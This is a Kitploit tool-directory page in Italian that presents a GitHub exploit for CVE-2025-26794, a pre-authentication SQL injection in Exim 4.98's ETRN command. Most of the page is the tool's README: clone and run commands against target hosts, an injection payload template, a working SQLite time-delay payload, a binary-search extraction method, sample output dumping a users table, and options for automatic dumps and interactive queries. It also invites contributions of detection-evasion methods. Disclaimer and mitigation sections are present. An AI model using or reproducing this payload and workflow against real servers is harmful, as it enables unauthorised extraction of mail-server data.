Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-26794-exploit — Exploit di SQL injection per CVE-2025-26794 in Exim 4.98. Estrazione automatizzata dei dati tramite SQLi blind basata sul tempo. Solo per test di penetrazione autorizzati. | Kitploit
Strumenti/GitHubGitHub/xploitgh0st/cve-2025-26794-exploit
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingSicurezza dei Database
GitHubxploitgh0st/cve-2025-26794-exploit

CVE-2025-26794-exploit

Exploit di SQL injection per CVE-2025-26794 in Exim 4.98. Estrazione automatizzata dei dati tramite SQLi blind basata sul tempo. Solo per test di penetrazione autorizzati.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
29 mesi faNon ancora revisionato

CVE-2025-26794: Exploit di SQL Injection ETRN in Exim

Python Version License Status

Uno strumento proof-of-concept per CVE-2025-26794, che dimostra la vulnerabilità di SQL injection nel server di posta Exim 4.98 tramite il comando ETRN quando si utilizza l'archiviazione DBM SQLite.

⚠️ Disclaimer Legale

SOLO PER TEST DI SICUREZZA AUTORIZZATI

Questo strumento è fornito esclusivamente a scopo educativo e per test di penetrazione autorizzati. L'accesso non autorizzato a sistemi informatici è illegale ai sensi di diverse leggi, tra cui:

  • Computer Fraud and Abuse Act (CFAA) negli Stati Uniti
  • Computer Misuse Act nel Regno Unito
  • Legislazione analoga in altre giurisdizioni

È necessario disporre di un'autorizzazione scritta esplicita prima di testare qualsiasi sistema che non si possiede.

Gli autori e i collaboratori non si assumono alcuna responsabilità per usi impropri o danni causati da questo strumento.

📋 Panoramica della Vulnerabilità

CVE-2025-26794 è una vulnerabilità di SQL injection in Exim 4.98 che si verifica quando:

  • Exim è configurato con archiviazione DBM SQLite
  • Il gestore del comando ETRN elabora dati serializzati
  • L'input controllato dall'utente non viene adeguatamente sanitizzato prima della costruzione della query SQL

Questa vulnerabilità consente agli attaccanti di:

  • Estrarre dati sensibili dal database del server di posta
  • Eseguire attacchi di SQL injection cieca basata sul tempo
  • Enumerare la struttura del database (tabelle, colonne, dati)

Versioni Interessate

  • Exim 4.98 con configurazione DBM SQLite

Vettore d'Attacco

  • Servizio SMTP accessibile dalla rete (tipicamente porta 25)
  • Nessuna autenticazione richiesta (comando ETRN disponibile pre-autenticazione)

🚀 Funzionalità

  • Test di Vulnerabilità: Controllo automatizzato per confermare se il target è vulnerabile
  • SQL Injection Cieca Basata sul Tempo: Utilizza tecniche di ritardo temporale SQLite per l'estrazione dei dati
  • Ottimizzazione con Ricerca Binaria: Estrazione efficiente carattere per carattere
  • Dump Automatico del Database: Estrae tabelle, colonne e dati di esempio
  • Modalità Interattiva: Esegui query SQL personalizzate in modo interattivo
  • Funzionamento Multi-Modale: Strategie di estrazione flessibili

📦 Installazione

Requisiti

  • Python 3.6 o superiore
  • Accesso di rete al server SMTP target

Configurazione

root@kitploit:~
# Clona il repository
git clone https://github.com/XploitGh0st/CVE-2025-26794-exploit.git
cd CVE-2025-26794-exploit

# Installa le dipendenze (nessuna richiesta - utilizza solo la libreria standard)
pip install -r requirements.txt

# Rendi eseguibile lo script (Linux/Mac)
chmod +x exploit.py

💻 Utilizzo

Sintassi di Base

root@kitploit:~
python3 exploit.py <target> [options]

Esempi Rapidi

1. Verifica se il Target è Vulnerabile

root@kitploit:~
python3 exploit.py 192.168.1.10 --test-only

2. Dump Automatico del Database

root@kitploit:~
python3 exploit.py mail.example.com --auto-dump

3. Modalità Query SQL Interattiva

root@kitploit:~
python3 exploit.py 10.0.0.5 --interactive

4. Estrazione della Struttura di una Tabella Specifica

root@kitploit:~
python3 exploit.py 192.168.1.10 --table users --columns

5. Esecuzione di una Query SQL Personalizzata

root@kitploit:~
python3 exploit.py 192.168.1.10 --query "SELECT sqlite_version()"

Opzioni della Riga di Comando

🔍 Come Funziona

Flusso dell'Attacco

  1. Connessione: Stabilisce una connessione SMTP al server target
  2. Misurazione della Baseline: Invia un comando ETRN normale per misurare il tempo di risposta
  3. Test di Iniezione: Invia un payload SQL con ritardo temporale per confermare la vulnerabilità
  4. Estrazione dei Dati: Utilizza la ricerca binaria con SQL injection cieca basata sul tempo per estrarre i dati carattere per carattere

Struttura del Payload di SQL Injection

root@kitploit:~
ETRN #',1); <MALICIOUS_QUERY> /*

Il payload sfrutta una sanitizzazione impropria nel gestore di serializzazione ETRN, consentendo l'iniezione di SQL nelle query SQLite.

Rilevamento Basato sul Tempo

Utilizza il ritardo temporale specifico di SQLite:

root@kitploit:~
SELECT 1 FROM tbl WHERE 1234=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))

Questo crea un ritardo misurabile (~1-2 secondi) quando la condizione è vera.

📊 Esempio di Output

root@kitploit:~
╔═══════════════════════════════════════════════════════════╗
║     CVE-2025-26794: Exim SQLi Data Extraction Tool        ║
║                  FOR AUTHORIZED USE ONLY                  ║
╚═══════════════════════════════════════════════════════════╝

[*] Testing vulnerability...
[+] Normal response time: 0.123s
[+] Delayed response time: 1.456s
[!!!] VULNERABLE - Time difference: 1.333s

[*] Extracting table names...
[*] Extracting table 1...
[+] Extracted: users
[+] Found table: users

[*] Extracting columns from table 'users'...
[+] Found column: id
[+] Found column: username
[+] Found column: email

🛡️ Mitigazione

Se stai eseguendo Exim 4.98 con DBM SQLite:

  1. Aggiorna Exim: Esegui l'upgrade alla versione con patch (4.98.1 o successiva)
  2. Validazione degli Input: Implementa una validazione rigorosa del comando ETRN
  3. Query Parametrizzate: Utilizza prepared statement per tutte le operazioni sul database
  4. Regole Firewall: Limita l'accesso SMTP alle reti fidate
  5. Disabilita ETRN: Se non necessario, disabilita il comando ETRN nella configurazione di Exim

🔧 Dettagli Tecnici

Algoritmo di Ricerca Binaria

Lo strumento utilizza la ricerca binaria per estrarre i caratteri in modo efficiente:

  • Intervallo ASCII stampabile: 32-126
  • Query medie per carattere: ~7 (log₂ 94)
  • Ottimizzato per un traffico di rete minimo

Funzioni SQLite Utilizzate

  • unicode(): Ottiene il valore ASCII del carattere
  • substr(): Estrae una sottostringa dal risultato
  • sqlite_master: Tabella di sistema per l'enumerazione dello schema
  • pragma_table_info(): Estrazione dei metadati delle colonne

📚 Riferimenti

  • Dettagli CVE: CVE-2025-26794
  • Advisory di Sicurezza Exim: [Advisory Ufficiale Exim]
  • OWASP SQL Injection: Guida OWASP

🤝 Contributi

I contributi sono benvenuti per:

  • Ottimizzazioni delle prestazioni
  • Tecniche di estrazione aggiuntive
  • Metodi di evasione del rilevamento
  • Correzione di bug e miglioramenti

Assicurati che tutti i contributi includano:

  • Documentazione chiara
  • Linee guida per la divulgazione responsabile
  • Avvisi sull'uso legale

📝 Licenza

Questo progetto è rilasciato a soli fini educativi. Usalo in modo responsabile e legale.

👤 Autore

XploitGh0st

  • GitHub: @XploitGh0st

🙏 Ringraziamenti

  • Il team di sviluppo di Exim per la gestione responsabile della vulnerabilità
  • La comunità di ricerca sulla sicurezza
  • I ricercatori sulle tecniche di SQL injection basata sul tempo in SQLite

⚖️ Divulgazione Responsabile

Se scopri vulnerabilità utilizzando questo strumento:

  1. Non divulgare pubblicamente i dettagli immediatamente
  2. Contatta privatamente il fornitore/mantenitore
  3. Concedi un tempo ragionevole per il rilascio della patch (tipicamente 90 giorni)
  4. Segui le linee guida per la divulgazione coordinata

Ricorda: Da un grande potere deriva una grande responsabilità. Usa questo strumento in modo etico e legale.

Scarica lo strumento
OpzioneDescrizione
hostHostname o indirizzo IP del target (obbligatorio)
-p, --portPorta SMTP (predefinita: 25)
-t, --timeoutTimeout del socket in secondi (predefinito: 30)
--thresholdSoglia di ritardo temporale per il rilevamento (predefinita: 0.8s)
--test-onlyTesta solo la vulnerabilità, nessuna estrazione di dati
--auto-dumpDump automatico della struttura e dei dati del database
--interactiveAvvia la console interattiva per query SQL
--table TABLESeleziona una tabella specifica per l'estrazione
--columnsEstrae i nomi delle colonne (da usare con --table)
--query QUERYEsegue una query SQL personalizzata